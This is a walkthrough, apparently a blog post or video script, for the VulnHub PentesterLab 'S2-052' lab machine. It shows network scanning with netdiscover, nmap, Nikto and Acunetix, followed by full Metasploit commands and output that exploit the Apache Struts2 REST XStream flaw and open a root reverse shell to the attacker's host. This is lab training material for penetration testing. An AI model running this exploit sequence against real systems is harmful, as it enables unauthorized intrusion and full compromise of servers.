Pentester Lab: S2-052 || VulnHub PentesterLab Walkthrough

Hello, everyone! Thank you for tuning in to our latest video. Today, we're diving into a tutorial series focusing on vulnerable machines called "PenetesterLab". Our target for this session is a machine labeled "s2-052".

To get started, you'll need to grab the vulnerable image from VulnHub's website. If you're new to VulnHub, don't worry; you can check out our previous videos in the VulnHub playlist for a primer.

Pentester Lab S2.052

Pentester Lab S2.052 is a vulnerable virtual machine hosted on Vulnhub. It provides an environment for practicing penetration testing skills and learning about various security vulnerabilities.

Once you have the image, setting up the virtual machine (VM) in VirtualBox is our next step.


Settings Up

In this section, we're going to guide you through setting up a new virtual machine (VM) in VirtualBox. Since the file we've downloaded comes in the ".iso" format, the first step is creating a new VM.

Begin by launching VirtualBox.

Then, click on "New" to initiate the creation of a new virtual machine (VM). 

Here, we'll need to specify the Virtual Machine Name, Operating System type, and version. Since we obtained the information from the VulnHub page, we know that the vulnerable iso is Linux-based.

Click next, to customize the hardware settings by adjusting the RAM and Virtual CPU count.

Click Next, and you'll be prompted to create a new virtual hard disk. This step allows you to allocate storage space according to your requirements. 

After configuring the disk, click "Next", to confirm the changes that we did earlier.

Finally, click "Finish" to complete the creation of your VM. Once the VM is created, you'll see it listed in the VirtualBox Manager. 

Now, Let's organize it by grouping it under "PenetesterLab". 

Now, let's configure the settings. 

Select the VM, click on "Settings", and navigate to the storage settings. 

Here, add the iso image. 

Now, change the network adapter to "Host-only adapter" in network settings.

It's important to ensure that both your Kali Linux machine, which I use it for performing attacks, and the vulnerable machine are connected to the same network.

With everything set up, it's time to start the Virtual Machines. 

You'll notice that the Vulnerable Machine is ready, displaying a shell prompt for input. However, our goal is to access it from the Kali machine. 

Let's dive into the fun!

 

Enumeration

Enumeration is the first process of our attack, aimed at identifying the IP Address of our Target Machine using NetDiscover. 

To do this, open a terminal, run "netdiscover -i" and then specify the network interface name, which is eth1.

┌──(kali㉿kali)-[~]
└─$ sudo netdiscover -i eth1

 Currently scanning: 192.168.103.0/16   |   Screen View: Unique Hosts                                                                   
                                                                                                                                        
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                                        
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.95.1    0a:00:27:00:00:02      1      60  Unknown vendor                                                                       
 192.168.95.2    08:00:27:02:66:ef      1      60  PCS Systemtechnik GmbH                                                               
 192.168.95.4    08:00:27:ba:a8:5e      1      60  PCS Systemtechnik GmbH

From the scan result, we have obtained our target IP address, which is, "192.168.95.4".

Next, we move on to conducting a network scan to identify open ports. This step is crucial in understanding the attack surface and planning targeted attacks. We'll utilize the widely-used Nmap tool for this task. Execute "nmap -A" followed by the IP address. 

Where, the "-A" flag enables a comprehensive scan across all available ports, providing insights into the versions running on each port.

┌──(kali㉿kali)-[~]
└─$ nmap -A 192.168.95.4    
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-25 23:22 IST
Nmap scan report for 192.168.95.4
Host is up (0.0015s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
| http-title: Orders
|_Requested resource was /orders.xhtml
|_http-server-header: Apache-Coyote/1.1
| http-cookie-flags: 
|   /: 
|     JSESSIONID: 
|_      httponly flag not set

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.18 seconds
                                                                                                                                         
┌──(kali㉿kali)-[~]
└─$

After conducting the network scan, we spotted the presence of one open port.

Specifically, The Port 80/TCP, is basically running an HTTP service. This suggests the presence of a vulnerable web application.

So let’s take a look at the web content running on port 80. To look at the contents ourselves, we can open a web browser of our choice, and navigate to the target's IP address in the URL bar at the top of the window.

Upon examining the webpage, there appears to be a potential vulnerability. Let's utilize the Nikto command line tool to identify it.

┌──(kali㉿kali)-[~]
└─$ nikto -h http://192.168.95.4/orders.xhtml
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.95.4
+ Target Hostname:    192.168.95.4
+ Target Port:        80
+ Start Time:         2024-04-25 23:23:52 (GMT5.5)
---------------------------------------------------------------------------
+ Server: Apache-Coyote/1.1
+ /orders.xhtml/: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /orders.xhtml/: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /orders.xhtml: Cookie JSESSIONID created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ : Server banner changed from 'Apache-Coyote/1.1' to 'Apache/2.2.21 (Unix) DAV/2'.
+ OPTIONS: Allowed HTTP Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS .
+ HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
+ HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
+ 8101 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time:           2024-04-25 23:24:37 (GMT5.5) (45 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
                                                                                                                                         
┌──(kali㉿kali)-[~]
└─$ 

If you're unfamiliar with Nikto, we've covered it in a previous video. 


Feel free to check it out for more information.

Nikto Web Application Security Scanner

This article delves into Nikto, a widely used web application security scanner. Nikto is designed to identify various vulnerabilities and misconfigurations in web servers and web applications, making it an essential tool for security professionals.


After analyzing the results, we've uncovered a MIME content type vulnerability. 

However, this finding alone doesn't provide much insight. To conduct a more thorough scan and uncover additional vulnerabilities, I'll employ the use of "Acunetix".

To launch the Acunetix dashboard, simply run the command "service acunetix start" in your terminal. 

┌──(kali㉿kali)-[~]
└─$ service acunetix start

This will initiate the Acunetix server on Port 3443 on localhost. 

If Acunetix isn't available, alternatives like OpenVAS or Nessus can be utilized.

Mastering OpenVAS: Scanning Vulnerable Environments

This in-depth guide covers the process of mastering OpenVAS for scanning vulnerable environments. OpenVAS is a powerful open-source vulnerability scanner used for identifying security issues in networks and systems.

For those interested in installing Acunetix on Kali for free, check out the blog link provided below this video.

Installing Acunetix on Kali Linux with Docker

This tutorial provides a detailed guide on how to install Acunetix on Kali Linux using Docker. Acunetix is a powerful web vulnerability scanner, and Docker provides a convenient way to set up and manage software environments.

Once on the Acunetix dashboard page, navigate to "Targets" and select "Add target" to begin scanning. 

Input the URL of the potential vulnerability and save the target.



No further adjustments are necessary; simply click "Scan" to initiate the process. 

From here, you can customize the scanning options to your preference. For instance, I've chosen a full scan type. After configuring the options, simply click "Create scan" to initiate the scanning process.

The scanning process has begun, and you can monitor its progress in the Activity section through the progress bar.

However, as the scanning is consuming considerable time, I'll halt it momentarily. I believe I've already identified the vulnerability.

It appears to be the Apache Struts2 Remote Code Execution (s2-052) vulnerability. 

Here, you will find out the detailed information regarding this vulnerability, offering further insights. Take a look if you wish to delve deeper.

Now that we've identified the vulnerability, it's time to move on to the exploitation step.

 

Exploitation

To exploit this vulnerability, we'll utilize the MSF console, which can be easily accessed from the Kali menu.

Once opened, you'll find yourself in the MSF6 console. 

$ sudo msfdb init && msfconsole
[sudo] password for kali: 
[i] Database already started
[i] The database appears to be already configured, skipping initialization
Metasploit tip: Enable verbose logging with set VERBOSE true
                                                  
                          ########                  #
                      #################            #
                   ######################         #
                  #########################      #
                ############################
               ##############################
               ###############################
              ###############################
              ##############################
                              #    ########   #
                 ##        ###        ####   ##
                                      ###   ###
                                    ####   ###
               ####          ##########   ####
               #######################   ####
                 ####################   ####
                  ##################  ####
                    ############      ##
                       ########        ###
                      #########        #####
                    ############      ######
                   ########      #########
                     #####       ########
                       ###       #########
                      ######    ############
                     #######################
                     #   #   ###  #   #   ##
                     ########################
                      ##     ##   ##     ##
                            https://metasploit.com


       =[ metasploit v6.4.5-dev                           ]
+ -- --=[ 2413 exploits - 1239 auxiliary - 423 post       ]
+ -- --=[ 1468 payloads - 47 encoders - 11 nops           ]
+ -- --=[ 9 evasion                                       ]

Metasploit Documentation: https://docs.metasploit.com/

msf6 >

Here, we'll search for the vulnerability "s2-052".

msf6 > search s2-052

Matching Modules
================

   #  Name                                     Disclosure Date  Rank       Check  Description
   -  ----                                     ---------------  ----       -----  -----------
   0  exploit/multi/http/struts2_rest_xstream  2017-09-05       excellent  Yes    Apache Struts 2 REST Plugin XStream RCE
   1    \_ target: Unix (In-Memory)            .                .          .      .
   2    \_ target: Windows (In-Memory)         .                .          .      .
   3    \_ target: Python (In-Memory)          .                .          .      .
   4    \_ target: PowerShell (In-Memory)      .                .          .      .
   5    \_ target: Linux (Dropper)             .                .          .      .
   6    \_ target: Windows (Dropper)           .                .          .      .


Interact with a module by name or index. For example info 6, use 6 or use exploit/multi/http/struts2_rest_xstream
After interacting with a module you can manually set a TARGET with set TARGET 'Windows (Dropper)'

msf6 >

The search results display 6 modules, tailored to different operating systems. We already know the OS is Linux, but to confirm it, we can use n map. Here Linux is confirmed.

┌──(kali㉿kali)-[~]
└─$ sudo nmap -O 192.168.95.4
[sudo] password for kali: 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-25 23:36 IST
Nmap scan report for 192.168.95.4
Host is up (0.00046s latency).
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE
80/tcp open  http
MAC Address: 08:00:27:BA:A8:5E (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2.10 seconds
                                                                                                                                          
┌──(kali㉿kali)-[~]
└─$ 

To proceed, execute "use 5" to select the Linux module, where the payload will be automatically selected.

msf6 > use 5
[*] Additionally setting TARGET => Linux (Dropper)
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/http/struts2_rest_xstream) >

Next, utilize the "options" command to display the required parameters for the attack.

msf6 exploit(multi/http/struts2_rest_xstream) > options 

Module options (exploit/multi/http/struts2_rest_xstream):

   Name       Current Setting                  Required  Description
   ----       ---------------                  --------  -----------
   Proxies                                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basi
                                                         cs/using-metasploit.html
   RPORT      8080                             yes       The target port (TCP)
   SSL        false                            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /struts2-rest-showcase/orders/3  yes       Path to Struts action
   URIPATH                                     no        The URI to use for this exploit (default is random)
   VHOST                                       no        HTTP server virtual host


   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine o
                                       r 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.0.2.15        yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   4   Linux (Dropper)



View the full module info with the info, or info -d command.

msf6 exploit(multi/http/struts2_rest_xstream) >

Here, we need to provide, RHOST, RPORT, TARGETURI, LHOST, and LPORT, and also some cases we have to provide, SRVHOST, and SRVPORT.

msf6 exploit(multi/http/struts2_rest_xstream) > set RHOST 192.168.95.4
RHOST => 192.168.95.4
msf6 exploit(multi/http/struts2_rest_xstream) > set RPORT 80
RPORT => 80
msf6 exploit(multi/http/struts2_rest_xstream) > set TARGETURI /orders/3/edit
TARGETURI => /orders/3/edit
msf6 exploit(multi/http/struts2_rest_xstream) > set LHOST 192.168.95.3
LHOST => 192.168.95.3
msf6 exploit(multi/http/struts2_rest_xstream) > set LPORT 443
LPORT => 443
msf6 exploit(multi/http/struts2_rest_xstream) > set SRVHOST 192.168.95.3
SRVHOST => 192.168.95.3
msf6 exploit(multi/http/struts2_rest_xstream) > set SRVPORT 443
SRVPORT => 443
msf6 exploit(multi/http/struts2_rest_xstream) >

With the configuration complete, we're ready to establish a foothold on the server. Let's proceed.

 

Foothold

Run the “exploit” command, to obtain the shell if it is successful.

msf6 exploit(multi/http/struts2_rest_xstream) > exploit

[*] Started reverse TCP handler on 192.168.95.3:443 
[*] Command Stager progress - 100.00% done (823/823 bytes)
[*] Exploit completed, but no session was created.
msf6 exploit(multi/http/struts2_rest_xstream) > 

Upon running the “exploit”, we encountered an error message: "Exploit completed but no session was created."

Now, let's carefully analyze the options to ensure everything is configured correctly. Upon verification, all settings appear to be in order. It appears to be like, the issue may lie with the payload selected. 

Let's address this by selecting a different payload.

Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.95.3     yes       The listen address (an interface may be specified)
   LPORT  443              yes       The listen port


View the full module info with the info, or info -d command.

Run "show payloads", to view the available payloads for Linux. 

msf6 exploit(multi/http/struts2_rest_xstream) > show payloads 

Compatible Payloads
===================

   #   Name                                              Disclosure Date  Rank    Check  Description
   -   ----                                              ---------------  ----    -----  -----------
   0   payload/generic/custom                            .                normal  No     Custom Payload
   1   payload/generic/debug_trap                        .                normal  No     Generic x86 Debug Trap
   2   payload/generic/shell_bind_aws_ssm                .                normal  No     Command Shell, Bind SSM (via AWS API)
   3   payload/generic/shell_bind_tcp                    .                normal  No     Generic Command Shell, Bind TCP Inline
   4   payload/generic/shell_reverse_tcp                 .                normal  No     Generic Command Shell, Reverse TCP Inline
   5   payload/generic/ssh/interact                      .                normal  No     Interact with Established SSH Connection
   6   payload/generic/tight_loop                        .                normal  No     Generic x86 Tight Loop
   7   payload/linux/x64/exec                            .                normal  No     Linux Execute Command
   8   payload/linux/x64/meterpreter/bind_tcp            .                normal  No     Linux Mettle x64, Bind TCP Stager
   9   payload/linux/x64/meterpreter/reverse_sctp        .                normal  No     Linux Mettle x64, Reverse SCTP Stager
   10  payload/linux/x64/meterpreter/reverse_tcp         .                normal  No     Linux Mettle x64, Reverse TCP Stager
   11  payload/linux/x64/meterpreter_reverse_http        .                normal  No     Linux Meterpreter, Reverse HTTP Inline
   12  payload/linux/x64/meterpreter_reverse_https       .                normal  No     Linux Meterpreter, Reverse HTTPS Inline
   13  payload/linux/x64/meterpreter_reverse_tcp         .                normal  No     Linux Meterpreter, Reverse TCP Inline
   14  payload/linux/x64/pingback_bind_tcp               .                normal  No     Linux x64 Pingback, Bind TCP Inline
   15  payload/linux/x64/pingback_reverse_tcp            .                normal  No     Linux x64 Pingback, Reverse TCP Inline
   16  payload/linux/x64/shell/bind_tcp                  .                normal  No     Linux Command Shell, Bind TCP Stager
   17  payload/linux/x64/shell/reverse_sctp              .                normal  No     Linux Command Shell, Reverse SCTP Stager
   18  payload/linux/x64/shell/reverse_tcp               .                normal  No     Linux Command Shell, Reverse TCP Stager
   19  payload/linux/x64/shell_bind_ipv6_tcp             .                normal  No     Linux x64 Command Shell, Bind TCP Inline (IPv6)
   20  payload/linux/x64/shell_bind_tcp                  .                normal  No     Linux Command Shell, Bind TCP Inline
   21  payload/linux/x64/shell_bind_tcp_random_port      .                normal  No     Linux Command Shell, Bind TCP Random Port Inline
   22  payload/linux/x64/shell_reverse_ipv6_tcp          .                normal  No     Linux x64 Command Shell, Reverse TCP Inline (IPv6)
   23  payload/linux/x64/shell_reverse_tcp               .                normal  No     Linux Command Shell, Reverse TCP Inline
   24  payload/linux/x86/chmod                           .                normal  No     Linux Chmod
   25  payload/linux/x86/exec                            .                normal  No     Linux Execute Command
   26  payload/linux/x86/meterpreter/bind_ipv6_tcp       .                normal  No     Linux Mettle x86, Bind IPv6 TCP Stager (Linux x86)
   27  payload/linux/x86/meterpreter/bind_ipv6_tcp_uuid  .                normal  No     Linux Mettle x86, Bind IPv6 TCP Stager with UUID Support (Linux x86)
   28  payload/linux/x86/meterpreter/bind_nonx_tcp       .                normal  No     Linux Mettle x86, Bind TCP Stager
   29  payload/linux/x86/meterpreter/bind_tcp            .                normal  No     Linux Mettle x86, Bind TCP Stager (Linux x86)
   30  payload/linux/x86/meterpreter/bind_tcp_uuid       .                normal  No     Linux Mettle x86, Bind TCP Stager with UUID Support (Linux x86)
   31  payload/linux/x86/meterpreter/reverse_ipv6_tcp    .                normal  No     Linux Mettle x86, Reverse TCP Stager (IPv6)
   32  payload/linux/x86/meterpreter/reverse_nonx_tcp    .                normal  No     Linux Mettle x86, Reverse TCP Stager
   33  payload/linux/x86/meterpreter/reverse_tcp         .                normal  No     Linux Mettle x86, Reverse TCP Stager
   34  payload/linux/x86/meterpreter/reverse_tcp_uuid    .                normal  No     Linux Mettle x86, Reverse TCP Stager
   35  payload/linux/x86/meterpreter_reverse_http        .                normal  No     Linux Meterpreter, Reverse HTTP Inline
   36  payload/linux/x86/meterpreter_reverse_https       .                normal  No     Linux Meterpreter, Reverse HTTPS Inline
   37  payload/linux/x86/meterpreter_reverse_tcp         .                normal  No     Linux Meterpreter, Reverse TCP Inline
   38  payload/linux/x86/metsvc_bind_tcp                 .                normal  No     Linux Meterpreter Service, Bind TCP
   39  payload/linux/x86/metsvc_reverse_tcp              .                normal  No     Linux Meterpreter Service, Reverse TCP Inline
   40  payload/linux/x86/read_file                       .                normal  No     Linux Read File
   41  payload/linux/x86/shell/bind_ipv6_tcp             .                normal  No     Linux Command Shell, Bind IPv6 TCP Stager (Linux x86)
   42  payload/linux/x86/shell/bind_ipv6_tcp_uuid        .                normal  No     Linux Command Shell, Bind IPv6 TCP Stager with UUID Support (Linux x86)
   43  payload/linux/x86/shell/bind_nonx_tcp             .                normal  No     Linux Command Shell, Bind TCP Stager
   44  payload/linux/x86/shell/bind_tcp                  .                normal  No     Linux Command Shell, Bind TCP Stager (Linux x86)
   45  payload/linux/x86/shell/bind_tcp_uuid             .                normal  No     Linux Command Shell, Bind TCP Stager with UUID Support (Linux x86)
   46  payload/linux/x86/shell/reverse_ipv6_tcp          .                normal  No     Linux Command Shell, Reverse TCP Stager (IPv6)
   47  payload/linux/x86/shell/reverse_nonx_tcp          .                normal  No     Linux Command Shell, Reverse TCP Stager
   48  payload/linux/x86/shell/reverse_tcp               .                normal  No     Linux Command Shell, Reverse TCP Stager
   49  payload/linux/x86/shell/reverse_tcp_uuid          .                normal  No     Linux Command Shell, Reverse TCP Stager
   50  payload/linux/x86/shell_bind_ipv6_tcp             .                normal  No     Linux Command Shell, Bind TCP Inline (IPv6)
   51  payload/linux/x86/shell_bind_tcp                  .                normal  No     Linux Command Shell, Bind TCP Inline
   52  payload/linux/x86/shell_bind_tcp_random_port      .                normal  No     Linux Command Shell, Bind TCP Random Port Inline
   53  payload/linux/x86/shell_reverse_tcp               .                normal  No     Linux Command Shell, Reverse TCP Inline
   54  payload/linux/x86/shell_reverse_tcp_ipv6          .                normal  No     Linux Command Shell, Reverse TCP Inline (IPv6)

msf6 exploit(multi/http/struts2_rest_xstream) >

In this case, I'll choose "payload/linux/x86/shell/reverse_tcp".

msf6 exploit(multi/http/struts2_rest_xstream) > set payload payload/linux/x86/shell/reverse_tcp
payload => linux/x86/shell/reverse_tcp
msf6 exploit(multi/http/struts2_rest_xstream) >

After selecting the new payload, run the "options" command to ensure all necessary parameters are correctly configured.

msf6 exploit(multi/http/struts2_rest_xstream) > options

Module options (exploit/multi/http/struts2_rest_xstream):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.95.4     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasplo
                                         it.html
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /orders/3/edit   yes       Path to Struts action
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host


   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  192.168.95.3     yes       The local host or network interface to listen on. This must be an address on the local machine or
                                        0.0.0.0 to listen on all addresses.
   SRVPORT  443              yes       The local port to listen on.


Payload options (linux/x86/shell/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.95.3     yes       The listen address (an interface may be specified)
   LPORT  443              yes       The listen port


View the full module info with the info, or info -d command.

msf6 exploit(multi/http/struts2_rest_xstream) > show targets 

Exploit targets:
=================

    Id  Name
    --  ----
    4   Linux (Dropper)


msf6 exploit(multi/http/struts2_rest_xstream) >

With everything in order, execute the “exploit” command once more, and observe the results. 

msf6 exploit(multi/http/struts2_rest_xstream) > exploit

[*] Started reverse TCP handler on 192.168.95.3:443 
[*] Sending stage (36 bytes) to 192.168.95.4
[*] Command Stager progress - 100.00% done (763/763 bytes)
[*] Command shell session 1 opened (192.168.95.3:443 -> 192.168.95.4:59568) at 2024-04-26 00:01:04 +0530

Success! It appears the exploit has worked.

ls
apache-tomcat-6.0.41
bootlocal.sh
bootsync.sh
jre1.8.0_20
shutdown.sh
tcemirror

Finally, we've successfully established a foothold on the server. Confirm this by running the "whoami" command to verify if we have root privileges. 

whoami
root

Indeed, we do have root access.

Since we've achieved our objective without encountering any privilege escalation issues, there's no need to proceed further.

If you have any questions or concerns, feel free to leave them in the comments section below.

Post a Comment

0 Comments
* Please Don't Spam Here. All the Comments are Reviewed by Admin.

#buttons=(Ok, Go it!) #days=(20)

Our website uses cookies to enhance your experience. Learn More
Ok, Go it!